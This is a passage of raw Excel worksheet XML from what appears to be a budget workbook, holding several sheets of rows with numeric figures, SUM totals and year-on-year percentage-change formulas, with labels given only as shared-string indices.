      <c r="B11" s="567">
        <v>2036</v>
      </c>
      <c r="C11" s="568">
        <v>2000</v>
      </c>
      <c r="D11" s="432">
        <f t="shared" si="0"/>
        <v>-1.76817288801572</v>
      </c>
    </row>
    <row r="12" customFormat="1" ht="25" customHeight="1" spans="1:4">
      <c r="A12" s="566" t="s">
        <v>887</v>
      </c>
      <c r="B12" s="567"/>
      <c r="C12" s="568"/>
      <c r="D12" s="432"/>
    </row>
    <row r="13" ht="25" customHeight="1" spans="1:4">
      <c r="A13" s="569" t="s">
        <v>888</v>
      </c>
      <c r="B13" s="567">
        <v>11663</v>
      </c>
      <c r="C13" s="568">
        <v>11000</v>
      </c>
      <c r="D13" s="432">
        <f t="shared" si="0"/>
        <v>-5.68464374517706</v>
      </c>
    </row>
    <row r="14" ht="25" customHeight="1" spans="1:6">
      <c r="A14" s="570" t="s">
        <v>889</v>
      </c>
      <c r="B14" s="571">
        <f>SUM(B7:B13)</f>
        <v>140821</v>
      </c>
      <c r="C14" s="862">
        <f>SUM(C7:C13)</f>
        <v>184400</v>
      </c>
      <c r="D14" s="438">
        <f t="shared" si="0"/>
        <v>30.946378736126</v>
      </c>
      <c r="E14" s="863"/>
      <c r="F14" s="863"/>
    </row>
    <row r="15" ht="25" customHeight="1" spans="1:4">
      <c r="A15" s="572" t="s">
        <v>743</v>
      </c>
      <c r="B15" s="573">
        <f>B16+B17</f>
        <v>199500</v>
      </c>
      <c r="C15" s="573">
        <f>C16+C17</f>
        <v>176398</v>
      </c>
      <c r="D15" s="432">
        <f t="shared" si="0"/>
        <v>-11.5799498746867</v>
      </c>
    </row>
    <row r="16" ht="25" customHeight="1" spans="1:4">
      <c r="A16" s="574" t="s">
        <v>744</v>
      </c>
      <c r="B16" s="567">
        <v>140500</v>
      </c>
      <c r="C16" s="568">
        <v>100000</v>
      </c>
      <c r="D16" s="432">
        <f t="shared" si="0"/>
        <v>-28.8256227758007</v>
      </c>
    </row>
    <row r="17" ht="25" customHeight="1" spans="1:4">
      <c r="A17" s="574" t="s">
        <v>745</v>
      </c>
      <c r="B17" s="567">
        <v>59000</v>
      </c>
      <c r="C17" s="568">
        <v>76398</v>
      </c>
      <c r="D17" s="432">
        <f t="shared" si="0"/>
        <v>29.4881355932203</v>
      </c>
    </row>
    <row r="18" ht="25" customHeight="1" spans="1:4">
      <c r="A18" s="566" t="s">
        <v>746</v>
      </c>
      <c r="B18" s="567">
        <f>B19+B20+B21</f>
        <v>76966</v>
      </c>
      <c r="C18" s="567">
        <f>C19+C20+C21</f>
        <v>131619</v>
      </c>
      <c r="D18" s="432">
        <f t="shared" si="0"/>
        <v>71.0092768235325</v>
      </c>
    </row>
    <row r="19" ht="25" customHeight="1" spans="1:4">
      <c r="A19" s="574" t="s">
        <v>747</v>
      </c>
      <c r="B19" s="567">
        <v>8549</v>
      </c>
      <c r="C19" s="568">
        <v>5000</v>
      </c>
      <c r="D19" s="432">
        <f t="shared" si="0"/>
        <v>-41.5136273248333</v>
      </c>
    </row>
    <row r="20" ht="25" customHeight="1" spans="1:4">
      <c r="A20" s="574" t="s">
        <v>748</v>
      </c>
      <c r="B20" s="567"/>
      <c r="C20" s="568"/>
      <c r="D20" s="432"/>
    </row>
    <row r="21" ht="25" customHeight="1" spans="1:4">
      <c r="A21" s="574" t="s">
        <v>749</v>
      </c>
      <c r="B21" s="567">
        <v>68417</v>
      </c>
      <c r="C21" s="568">
        <v>126619</v>
      </c>
      <c r="D21" s="432">
        <f t="shared" si="0"/>
        <v>85.0695002704006</v>
      </c>
    </row>
    <row r="22" ht="25" customHeight="1" spans="1:6">
      <c r="A22" s="575" t="s">
        <v>750</v>
      </c>
      <c r="B22" s="576">
        <f>B14+B15+B18</f>
        <v>417287</v>
      </c>
      <c r="C22" s="576">
        <f>C14+C15+C18</f>
        <v>492417</v>
      </c>
      <c r="D22" s="577">
        <f t="shared" si="0"/>
        <v>18.0043950566397</v>
      </c>
      <c r="E22" s="863"/>
      <c r="F22" s="863"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="C3:D3"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.118055555555556" right="0.236111111111111" top="0.79" bottom="0.79" header="0.314583333333333" footer="0.31"/>
  <pageSetup paperSize="9" fitToHeight="0" orientation="portrait" useFirstPageNumber="1" errors="NA"/>
  <headerFooter alignWithMargins="0"/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:D35"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="7" topLeftCell="B21" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="B6" sqref="B6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.84259259259259" defaultRowHeight="15.6" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="58.9074074074074" style="828" customWidth="1"/>
    <col min="2" max="3" width="17.7222222222222" style="518" customWidth="1"/>
    <col min="4" max="4" width="17.7222222222222" style="829" customWidth="1"/>
    <col min="5" max="5" width="10.4259259259259" style="518" customWidth="1"/>
    <col min="6" max="16384" width="9.84259259259259" style="518"/>
  </cols>
  <sheetData>
    <row r="1" s="509" customFormat="1" ht="16.7" customHeight="1" spans="1:4">
      <c r="A1" s="830" t="s">
        <v>890</v>
      </c>
      <c r="B1" s="521"/>
      <c r="C1" s="521"/>
      <c r="D1" s="831"/>
    </row>
    <row r="2" s="509" customFormat="1" ht="16.7" customHeight="1" spans="1:4">
      <c r="A2" s="830"/>
      <c r="B2" s="521"/>
      <c r="C2" s="521"/>
      <c r="D2" s="831"/>
    </row>
    <row r="3" s="825" customFormat="1" ht="42" customHeight="1" spans="1:4">
      <c r="A3" s="722" t="s">
        <v>891</v>
      </c>
      <c r="B3" s="722"/>
      <c r="C3" s="722"/>
      <c r="D3" s="722"/>
    </row>
    <row r="4" s="511" customFormat="1" ht="21" customHeight="1" spans="1:4">
      <c r="A4" s="832"/>
      <c r="B4" s="833"/>
      <c r="C4" s="834" t="s">
        <v>373</v>
      </c>
      <c r="D4" s="835"/>
    </row>
    <row r="5" s="517" customFormat="1" ht="53.1" customHeight="1" spans="1:4">
      <c r="A5" s="836" t="s">
        <v>828</v>
      </c>
      <c r="B5" s="361" t="s">
        <v>519</v>
      </c>
      <c r="C5" s="837" t="s">
        <v>829</v>
      </c>
      <c r="D5" s="561" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="6" ht="23" customHeight="1" spans="1:4">
      <c r="A6" s="838" t="s">
        <v>892</v>
      </c>
      <c r="B6" s="839">
        <f>SUM(B7:B8)</f>
        <v>8</v>
      </c>
      <c r="C6" s="840"/>
      <c r="D6" s="841">
        <f>IFERROR((C6-B6)/B6,"-")*100</f>
        <v>-100</v>
      </c>
    </row>
    <row r="7" ht="23" customHeight="1" spans="1:4">
      <c r="A7" s="842" t="s">
        <v>893</v>
      </c>
      <c r="B7" s="839">
        <v>8</v>
      </c>
      <c r="C7" s="840"/>
      <c r="D7" s="841">
        <f>IFERROR((C7-B7)/B7,"-")*100</f>
        <v>-100</v>
      </c>
    </row>
    <row r="8" ht="23" customHeight="1" spans="1:4">
      <c r="A8" s="842" t="s">
        <v>755</v>
      </c>
      <c r="B8" s="839"/>
      <c r="C8" s="840"/>
      <c r="D8" s="841"/>
    </row>
    <row r="9" ht="23" customHeight="1" spans="1:4">
      <c r="A9" s="843" t="s">
        <v>894</v>
      </c>
      <c r="B9" s="839">
        <f>SUM(B10:B17)</f>
        <v>105072</v>
      </c>
      <c r="C9" s="839">
        <f>SUM(C10:C17)</f>
        <v>168143</v>
      </c>
      <c r="D9" s="841">
        <f>IFERROR((C9-B9)/B9,"-")*100</f>
        <v>60.0264580478148</v>
      </c>
    </row>
    <row r="10" ht="23" customHeight="1" spans="1:4">
      <c r="A10" s="843" t="s">
        <v>761</v>
      </c>
      <c r="B10" s="839">
        <v>83090</v>
      </c>
      <c r="C10" s="840">
        <v>100000</v>
      </c>
      <c r="D10" s="841">
        <f>IFERROR((C10-B10)/B10,"-")*100</f>
        <v>20.3514261644</v>
      </c>
    </row>
    <row r="11" ht="23" customHeight="1" spans="1:4">
      <c r="A11" s="843" t="s">
        <v>895</v>
      </c>
      <c r="B11" s="839"/>
      <c r="C11" s="840"/>
      <c r="D11" s="841"/>
    </row>
    <row r="12" ht="23" customHeight="1" spans="1:4">
      <c r="A12" s="842" t="s">
        <v>896</v>
      </c>
      <c r="B12" s="839">
        <v>6306</v>
      </c>
      <c r="C12" s="840">
        <v>10000</v>
      </c>
      <c r="D12" s="841">
        <f>IFERROR((C12-B12)/B12,"-")*100</f>
        <v>58.5791309863622</v>
      </c>
    </row>
    <row r="13" ht="23" customHeight="1" spans="1:4">
      <c r="A13" s="842" t="s">
        <v>897</v>
      </c>
      <c r="B13" s="839">
        <v>2036</v>
      </c>
      <c r="C13" s="840">
        <v>2000</v>
      </c>
      <c r="D13" s="841">
        <f>IFERROR((C13-B13)/B13,"-")*100</f>
        <v>-1.76817288801572</v>
      </c>
    </row>
    <row r="14" ht="23" customHeight="1" spans="1:4">
      <c r="A14" s="842" t="s">
        <v>766</v>
      </c>
      <c r="B14" s="839"/>
      <c r="C14" s="840"/>
      <c r="D14" s="841"/>
    </row>
    <row r="15" ht="23" customHeight="1" spans="1:4">
      <c r="A15" s="842" t="s">
        <v>767</v>
      </c>
      <c r="B15" s="839">
        <v>1600</v>
      </c>
      <c r="C15" s="840">
        <v>8300</v>
      </c>
      <c r="D15" s="841">
        <f>IFERROR((C15-B15)/B15,"-")*100</f>
        <v>418.75</v>
      </c>
    </row>
    <row r="16" ht="23" customHeight="1" spans="1:4">
      <c r="A16" s="842" t="s">
        <v>898</v>
      </c>
      <c r="B16" s="839">
        <v>11890</v>
      </c>
      <c r="C16" s="840">
        <v>44410</v>
      </c>
      <c r="D16" s="841">
        <f>IFERROR((C16-B16)/B16,"-")*100</f>
        <v>273.507148864592</v>
      </c>
    </row>
    <row r="17" ht="23" customHeight="1" spans="1:4">
      <c r="A17" s="842" t="s">
        <v>899</v>
      </c>
      <c r="B17" s="839">
        <v>150</v>
      </c>
      <c r="C17" s="840">
        <v>3433</v>
      </c>
      <c r="D17" s="841">
        <f>IFERROR((C17-B17)/B17,"-")*100</f>
        <v>2188.66666666667</v>
      </c>
    </row>
    <row r="18" ht="23" customHeight="1" spans="1:4">
      <c r="A18" s="842" t="s">
        <v>900</v>
      </c>
      <c r="B18" s="839">
        <v>1089</v>
      </c>
      <c r="C18" s="840">
        <v>800</v>
      </c>
      <c r="D18" s="841">
        <f>IFERROR((C18-B18)/B18,"-")*100</f>
        <v>-26.5381083562902</v>
      </c>
    </row>
    <row r="19" ht="23" customHeight="1" spans="1:4">
      <c r="A19" s="842" t="s">
        <v>901</v>
      </c>
      <c r="B19" s="839"/>
      <c r="C19" s="840"/>
      <c r="D19" s="841"/>
    </row>
    <row r="20" ht="23" customHeight="1" spans="1:4">
      <c r="A20" s="842" t="s">
        <v>902</v>
      </c>
      <c r="B20" s="839">
        <v>2913</v>
      </c>
      <c r="C20" s="840">
        <v>2000</v>
      </c>
      <c r="D20" s="841">
        <f>IFERROR((C20-B20)/B20,"-")*100</f>
        <v>-31.3422588396842</v>
      </c>
    </row>
    <row r="21" ht="23" customHeight="1" spans="1:4">
      <c r="A21" s="842" t="s">
        <v>903</v>
      </c>
      <c r="B21" s="839">
        <v>73473</v>
      </c>
      <c r="C21" s="839">
        <v>169110</v>
      </c>
      <c r="D21" s="841">
        <f t="shared" ref="D21:D34" si="0">IFERROR((C21-B21)/B21,"-")*100</f>
        <v>130.166183495978</v>
      </c>
    </row>
    <row r="22" ht="23" customHeight="1" spans="1:4">
      <c r="A22" s="842" t="s">
        <v>580</v>
      </c>
      <c r="B22" s="839">
        <v>71420</v>
      </c>
      <c r="C22" s="840">
        <v>167710</v>
      </c>
      <c r="D22" s="841">
        <f t="shared" si="0"/>
        <v>134.822178661439</v>
      </c>
    </row>
    <row r="23" ht="23" customHeight="1" spans="1:4">
      <c r="A23" s="842" t="s">
        <v>582</v>
      </c>
      <c r="B23" s="839">
        <v>2053</v>
      </c>
      <c r="C23" s="840">
        <v>1400</v>
      </c>
      <c r="D23" s="841">
        <f t="shared" si="0"/>
        <v>-31.8071115440818</v>
      </c>
    </row>
    <row r="24" ht="23" customHeight="1" spans="1:4">
      <c r="A24" s="842" t="s">
        <v>904</v>
      </c>
      <c r="B24" s="839">
        <v>23695</v>
      </c>
      <c r="C24" s="840">
        <v>27960</v>
      </c>
      <c r="D24" s="841">
        <f t="shared" si="0"/>
        <v>17.9995779700359</v>
      </c>
    </row>
    <row r="25" ht="23" customHeight="1" spans="1:4">
      <c r="A25" s="842" t="s">
        <v>905</v>
      </c>
      <c r="B25" s="839"/>
      <c r="C25" s="840"/>
      <c r="D25" s="841"/>
    </row>
    <row r="26" s="826" customFormat="1" ht="23" customHeight="1" spans="1:4">
      <c r="A26" s="844" t="s">
        <v>906</v>
      </c>
      <c r="B26" s="845">
        <f>B6+B9+B18+B19+B20+B21+B24+B25</f>
        <v>206250</v>
      </c>
      <c r="C26" s="845">
        <f>C6+C9+C18+C19+C20+C21+C24+C25</f>
        <v>368013</v>
      </c>
      <c r="D26" s="846">
        <f t="shared" si="0"/>
        <v>78.4305454545455</v>
      </c>
    </row>
    <row r="27" ht="23" customHeight="1" spans="1:4">
      <c r="A27" s="838" t="s">
        <v>907</v>
      </c>
      <c r="B27" s="839">
        <f>B28+B29</f>
        <v>59000</v>
      </c>
      <c r="C27" s="839">
        <f>C28+C29</f>
        <v>78220</v>
      </c>
      <c r="D27" s="841">
        <f t="shared" si="0"/>
        <v>32.5762711864407</v>
      </c>
    </row>
    <row r="28" ht="23" customHeight="1" spans="1:4">
      <c r="A28" s="838" t="s">
        <v>908</v>
      </c>
      <c r="B28" s="839"/>
      <c r="C28" s="840">
        <v>1822</v>
      </c>
      <c r="D28" s="841"/>
    </row>
    <row r="29" ht="23" customHeight="1" spans="1:4">
      <c r="A29" s="838" t="s">
        <v>909</v>
      </c>
      <c r="B29" s="839">
        <v>59000</v>
      </c>
      <c r="C29" s="840">
        <v>76398</v>
      </c>
      <c r="D29" s="841">
        <f t="shared" si="0"/>
        <v>29.4881355932203</v>
      </c>
    </row>
    <row r="30" s="826" customFormat="1" ht="23" customHeight="1" spans="1:4">
      <c r="A30" s="838" t="s">
        <v>910</v>
      </c>
      <c r="B30" s="839">
        <f>B31+B32+B33</f>
        <v>152037</v>
      </c>
      <c r="C30" s="839">
        <f>C31+C32+C33</f>
        <v>46184</v>
      </c>
      <c r="D30" s="841">
        <f t="shared" si="0"/>
        <v>-69.6231838302518</v>
      </c>
    </row>
    <row r="31" s="827" customFormat="1" ht="23" customHeight="1" spans="1:4">
      <c r="A31" s="847" t="s">
        <v>911</v>
      </c>
      <c r="B31" s="848">
        <v>160</v>
      </c>
      <c r="C31" s="849">
        <v>160</v>
      </c>
      <c r="D31" s="841"/>
    </row>
    <row r="32" ht="23" customHeight="1" spans="1:4">
      <c r="A32" s="838" t="s">
        <v>912</v>
      </c>
      <c r="B32" s="839">
        <v>25258</v>
      </c>
      <c r="C32" s="840">
        <v>46024</v>
      </c>
      <c r="D32" s="841">
        <f t="shared" si="0"/>
        <v>82.2155356718663</v>
      </c>
    </row>
    <row r="33" ht="23" customHeight="1" spans="1:4">
      <c r="A33" s="838" t="s">
        <v>913</v>
      </c>
      <c r="B33" s="850">
        <v>126619</v>
      </c>
      <c r="C33" s="851"/>
      <c r="D33" s="841">
        <f t="shared" si="0"/>
        <v>-100</v>
      </c>
    </row>
    <row r="34" s="826" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A34" s="852" t="s">
        <v>914</v>
      </c>
      <c r="B34" s="853">
        <f>B26+B27+B30</f>
        <v>417287</v>
      </c>
      <c r="C34" s="853">
        <f>C26+C27+C30</f>
        <v>492417</v>
      </c>
      <c r="D34" s="854">
        <f t="shared" si="0"/>
        <v>18.0043950566397</v>
      </c>
    </row>
    <row r="35" ht="16.7" customHeight="1" spans="1:4">
      <c r="A35" s="855"/>
      <c r="B35" s="855"/>
      <c r="C35" s="855"/>
      <c r="D35" s="856"/>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A3:D3"/>
    <mergeCell ref="C4:D4"/>
    <mergeCell ref="A35:D35"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.59" right="0.59" top="0.79" bottom="0.79" header="0.31" footer="0.31"/>
  <pageSetup paperSize="9" scale="82" fitToHeight="0" orientation="portrait" useFirstPageNumber="1" errors="NA"/>
  <headerFooter alignWithMargins="0"/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:IV180"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0">
      <pane xSplit="1" ySplit="8" topLeftCell="B9" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="D1" sqref="A$1:D$1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="44.7222222222222" style="800" customWidth="1"/>
    <col min="2" max="2" width="16" style="353" customWidth="1"/>
    <col min="3" max="3" width="15.7222222222222" style="813" customWidth="1"/>
    <col min="4" max="4" width="16.4537037037037" style="354" customWidth="1"/>
    <col min="5" max="241" width="10" style="800"/>
    <col min="242" max="16384" width="10" style="802"/>
  </cols>
  <sheetData>
    <row r="1" s="793" customFormat="1" ht="17.25" customHeight="1" spans="1:4">
      <c r="A1" s="334" t="s">
        <v>915</v>
      </c>
      <c r="B1" s="803"/>
      <c r="C1" s="814"/>
      <c r="D1" s="815"/>
    </row>
    <row r="2" s="793" customFormat="1" ht="17.25" customHeight="1" spans="1:4">
      <c r="A2" s="334"/>
      <c r="B2" s="803"/>
      <c r="C2" s="814"/>
      <c r="D2" s="815"/>
    </row>
    <row r="3" s="794" customFormat="1" ht="28.5" customHeight="1" spans="1:4">
      <c r="A3" s="722" t="s">
        <v>916</v>
      </c>
      <c r="B3" s="722"/>
      <c r="C3" s="722"/>
      <c r="D3" s="722"/>
    </row>
    <row r="4" s="794" customFormat="1" ht="28.5" customHeight="1" spans="1:4">
      <c r="A4" s="722"/>
      <c r="B4" s="722"/>
      <c r="C4" s="722"/>
      <c r="D4" s="722"/>
    </row>
    <row r="5" s="795" customFormat="1" ht="21.95" customHeight="1" spans="1:4">
      <c r="A5" s="805"/>
      <c r="B5" s="816"/>
      <c r="C5" s="817"/>
      <c r="D5" s="818" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="6" s="811" customFormat="1" ht="39" customHeight="1" spans="1:4">
      <c r="A6" s="819" t="s">
        <v>828</v>
      </c>
      <c r="B6" s="361" t="s">
        <v>519</v>
      </c>
      <c r="C6" s="808" t="s">
        <v>829</v>
      </c>
      <c r="D6" s="765" t="s">
        <v>917</v>
      </c>
    </row>
    <row r="7" s="812" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A7" s="428" t="s">
        <v>595</v>
      </c>
      <c r="B7" s="820"/>
      <c r="C7" s="430">
        <v>42</v>
      </c>
      <c r="D7" s="432"/>
    </row>
    <row r="8" s="812" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A8" s="451" t="s">
        <v>596</v>
      </c>
      <c r="B8" s="820">
        <v>1770</v>
      </c>
      <c r="C8" s="821">
        <v>6700</v>
      </c>
      <c r="D8" s="432">
        <f>IFERROR((C8-B8)/B8,"-")*100</f>
        <v>278.531073446328</v>
      </c>
    </row>
    <row r="9" s="812" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A9" s="452" t="s">
        <v>918</v>
      </c>
      <c r="B9" s="820">
        <v>1770</v>
      </c>
      <c r="C9" s="453">
        <v>6700</v>
      </c>
      <c r="D9" s="432">
        <f>IFERROR((C9-B9)/B9,"-")*100</f>
        <v>278.531073446328</v>
      </c>
    </row>
    <row r="10" s="812" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A10" s="452" t="s">
        <v>919</v>
      </c>
      <c r="B10" s="820"/>
      <c r="C10" s="453"/>
      <c r="D10" s="432"/>
    </row>
    <row r="11" s="812" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A11" s="428" t="s">
        <v>599</v>
      </c>
      <c r="B11" s="820"/>
      <c r="C11" s="430"/>
      <c r="D11" s="432"/>
    </row>
    <row r="12" s="812" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A12" s="433" t="s">
        <v>920</v>
      </c>
      <c r="B12" s="820"/>
      <c r="C12" s="430"/>
      <c r="D12" s="432"/>
    </row>
    <row r="13" s="812" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A13" s="433" t="s">
        <v>921</v>
      </c>
      <c r="B13" s="820">
        <v>0</v>
      </c>
      <c r="C13" s="430"/>
      <c r="D13" s="432"/>
    </row>
    <row r="14" s="812" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A14" s="428" t="s">
        <v>602</v>
      </c>
      <c r="B14" s="820"/>
      <c r="C14" s="430">
        <v>0</v>
      </c>
      <c r="D14" s="432"/>
    </row>
    <row r="15" s="812" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A15" s="428" t="s">
        <v>603</v>
      </c>
      <c r="B15" s="820">
        <v>10000</v>
      </c>
      <c r="C15" s="430"/>
      <c r="D15" s="432">
        <f>IFERROR((C15-B15)/B15,"-")*100</f>
        <v>-100</v>
      </c>
    </row>
    <row r="16" s="812" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A16" s="822" t="s">
        <v>889</v>
      </c>
      <c r="B16" s="457">
        <f>B7+B8+B11+B14+B15</f>
        <v>11770</v>
      </c>
      <c r="C16" s="457">
        <f>C7+C8+C11+C14+C15</f>
        <v>6742</v>
      </c>
      <c r="D16" s="438">
        <f>IFERROR((C16-B16)/B16,"-")*100</f>
        <v>-42.7187765505522</v>
      </c>
    </row>
    <row r="17" s="812" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A17" s="823" t="s">
        <v>746</v>
      </c>
      <c r="B17" s="462">
        <v>39</v>
      </c>
      <c r="C17" s="463">
        <v>39</v>
      </c>
      <c r="D17" s="432">
        <f>IFERROR((C17-B17)/B17,"-")*100</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" s="812" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A18" s="823" t="s">
        <v>747</v>
      </c>
      <c r="B18" s="462">
        <v>39</v>
      </c>
      <c r="C18" s="463">
        <v>39</v>
      </c>
      <c r="D18" s="432">
        <f>IFERROR((C18-B18)/B18,"-")*100</f>
        <v>0</v>
      </c>
    </row>
    <row r="19" s="812" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A19" s="823" t="s">
        <v>922</v>
      </c>
      <c r="B19" s="462"/>
      <c r="C19" s="463"/>
      <c r="D19" s="432"/>
    </row>
    <row r="20" s="812" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A20" s="824" t="s">
        <v>750</v>
      </c>
      <c r="B20" s="468">
        <f>B17+B16</f>
        <v>11809</v>
      </c>
      <c r="C20" s="469">
        <f>C17+C16</f>
        <v>6781</v>
      </c>
      <c r="D20" s="577">
        <f>IFERROR((C20-B20)/B20,"-")*100</f>
        <v>-42.5776949784063</v>
      </c>
    </row>
    <row r="21" s="800" customFormat="1" ht="24.95" customHeight="1" spans="2:256">
      <c r="B21" s="353"/>
      <c r="C21" s="813"/>
      <c r="D21" s="354"/>
      <c r="IH21" s="802"/>
      <c r="II21" s="802"/>
      <c r="IJ21" s="802"/>
      <c r="IK21" s="802"/>
      <c r="IL21" s="802"/>
      <c r="IM21" s="802"/>
      <c r="IN21" s="802"/>
      <c r="IO21" s="802"/>
      <c r="IP21" s="802"/>
      <c r="IQ21" s="802"/>
      <c r="IR21" s="802"/>
      <c r="IS21" s="802"/>
      <c r="IT21" s="802"/>
      <c r="IU21" s="802"/>
      <c r="IV21" s="802"/>
    </row>
    <row r="22" s="800" customFormat="1" spans="2:256">
      <c r="B22" s="353"/>
      <c r="C22" s="813"/>
      <c r="D22" s="354"/>
      <c r="IH22" s="802"/>
      <c r="II22" s="802"/>
      <c r="IJ22" s="802"/>
      <c r="IK22" s="802"/>
      <c r="IL22" s="802"/>
      <c r="IM22" s="802"/>
      <c r="IN22" s="802"/>
      <c r="IO22" s="802"/>
      <c r="IP22" s="802"/>
      <c r="IQ22" s="802"/>
      <c r="IR22" s="802"/>
      <c r="IS22" s="802"/>
      <c r="IT22" s="802"/>
      <c r="IU22" s="802"/>
      <c r="IV22" s="802"/>
    </row>
    <row r="23" s="800" customFormat="1" spans="2:256">
      <c r="B23" s="353"/>
      <c r="C23" s="813"/>
      <c r="D23" s="354"/>
      <c r="IH23" s="802"/>
      <c r="II23" s="802"/>
      <c r="IJ23" s="802"/>
      <c r="IK23" s="802"/>
      <c r="IL23" s="802"/>
      <c r="IM23" s="802"/>
      <c r="IN23" s="802"/>
      <c r="IO23" s="802"/>
      <c r="IP23" s="802"/>
      <c r="IQ23" s="802"/>
      <c r="IR23" s="802"/>
      <c r="IS23" s="802"/>
      <c r="IT23" s="802"/>
      <c r="IU23" s="802"/>
      <c r="IV23" s="802"/>
    </row>
    <row r="24" s="800" customFormat="1" spans="2:256">
      <c r="B24" s="353"/>
      <c r="C24" s="813"/>
      <c r="D24" s="354"/>
      <c r="IH24" s="802"/>
      <c r="II24" s="802"/>
      <c r="IJ24" s="802"/>
      <c r="IK24" s="802"/>
      <c r="IL24" s="802"/>
      <c r="IM24" s="802"/>
      <c r="IN24" s="802"/>
      <c r="IO24" s="802"/>
      <c r="IP24" s="802"/>
      <c r="IQ24" s="802"/>
      <c r="IR24" s="802"/>
      <c r="IS24" s="802"/>
      <c r="IT24" s="802"/>
      <c r="IU24" s="802"/>
      <c r="IV24" s="802"/>
    </row>
    <row r="25" s="800" customFormat="1" spans="2:256">
      <c r="B25" s="353"/>
      <c r="C25" s="813"/>
      <c r="D25" s="354"/>
      <c r="IH25" s="802"/>
      <c r="II25" s="802"/>
      <c r="IJ25" s="802"/>
      <c r="IK25" s="802"/>
      <c r="IL25" s="802"/>
      <c r="IM25" s="802"/>
      <c r="IN25" s="802"/>
      <c r="IO25" s="802"/>
      <c r="IP25" s="802"/>
      <c r="IQ25" s="802"/>
      <c r="IR25" s="802"/>
      <c r="IS25" s="802"/>
      <c r="IT25" s="802"/>
      <c r="IU25" s="802"/>
      <c r="IV25" s="802"/>
    </row>
    <row r="26" s="800" customFormat="1" spans="2:256">
      <c r="B26" s="353"/>
      <c r="C26" s="813"/>
      <c r="D26" s="354"/>
      <c r="IH26" s="802"/>
      <c r="II26" s="802"/>
      <c r="IJ26" s="802"/>
      <c r="IK26" s="802"/>
      <c r="IL26" s="802"/>
      <c r="IM26" s="802"/>
      <c r="IN26" s="802"/>
      <c r="IO26" s="802"/>
      <c r="IP26" s="802"/>
      <c r="IQ26" s="802"/>
      <c r="IR26" s="802"/>
      <c r="IS26" s="802"/>
      <c r="IT26" s="802"/>
      <c r="IU26" s="802"/>
      <c r="IV26" s="802"/>
    </row>
    <row r="27" s="800" customFormat="1" spans="2:256">
      <c r="B27" s="353"/>
      <c r="C27" s="813"/>
      <c r="D27" s="354"/>
      <c r="IH27" s="802"/>
      <c r="II27" s="802"/>
      <c r="IJ27" s="802"/>
      <c r="IK27" s="802"/>
      <c r="IL27" s="802"/>
      <c r="IM27" s="802"/>
      <c r="IN27" s="802"/>
      <c r="IO27" s="802"/>
      <c r="IP27" s="802"/>
      <c r="IQ27" s="802"/>
      <c r="IR27" s="802"/>
      <c r="IS27" s="802"/>
      <c r="IT27" s="802"/>
      <c r="IU27" s="802"/>
      <c r="IV27" s="802"/>
    </row>
    <row r="28" s="800" customFormat="1" spans="2:256">
      <c r="B28" s="353"/>
      <c r="C28" s="813"/>
      <c r="D28" s="354"/>
      <c r="IH28" s="802"/>
      <c r="II28" s="802"/>
      <c r="IJ28" s="802"/>
      <c r="IK28" s="802"/>
      <c r="IL28" s="802"/>
      <c r="IM28" s="802"/>
      <c r="IN28" s="802"/>
      <c r="IO28" s="802"/>
      <c r="IP28" s="802"/>
      <c r="IQ28" s="802"/>
      <c r="IR28" s="802"/>
      <c r="IS28" s="802"/>
      <c r="IT28" s="802"/>
      <c r="IU28" s="802"/>
      <c r="IV28" s="802"/>
    </row>
    <row r="29" s="800" customFormat="1" spans="2:256">
      <c r="B29" s="353"/>
      <c r="C29" s="813"/>
      <c r="D29" s="354"/>
      <c r="IH29" s="802"/>
      <c r="II29" s="802"/>
      <c r="IJ29" s="802"/>
      <c r="IK29" s="802"/>
      <c r="IL29" s="802"/>
      <c r="IM29" s="802"/>
      <c r="IN29" s="802"/>
      <c r="IO29" s="802"/>
      <c r="IP29" s="802"/>
      <c r="IQ29" s="802"/>
      <c r="IR29" s="802"/>
      <c r="IS29" s="802"/>
      <c r="IT29" s="802"/>
      <c r="IU29" s="802"/>
      <c r="IV29" s="802"/>
    </row>
    <row r="30" s="800" customFormat="1" spans="2:256">
      <c r="B30" s="353"/>
      <c r="C30" s="813"/>
      <c r="D30" s="354"/>
      <c r="IH30" s="802"/>
      <c r="II30" s="802"/>
      <c r="IJ30" s="802"/>
      <c r="IK30" s="802"/>
      <c r="IL30" s="802"/>
      <c r="IM30" s="802"/>
      <c r="IN30" s="802"/>
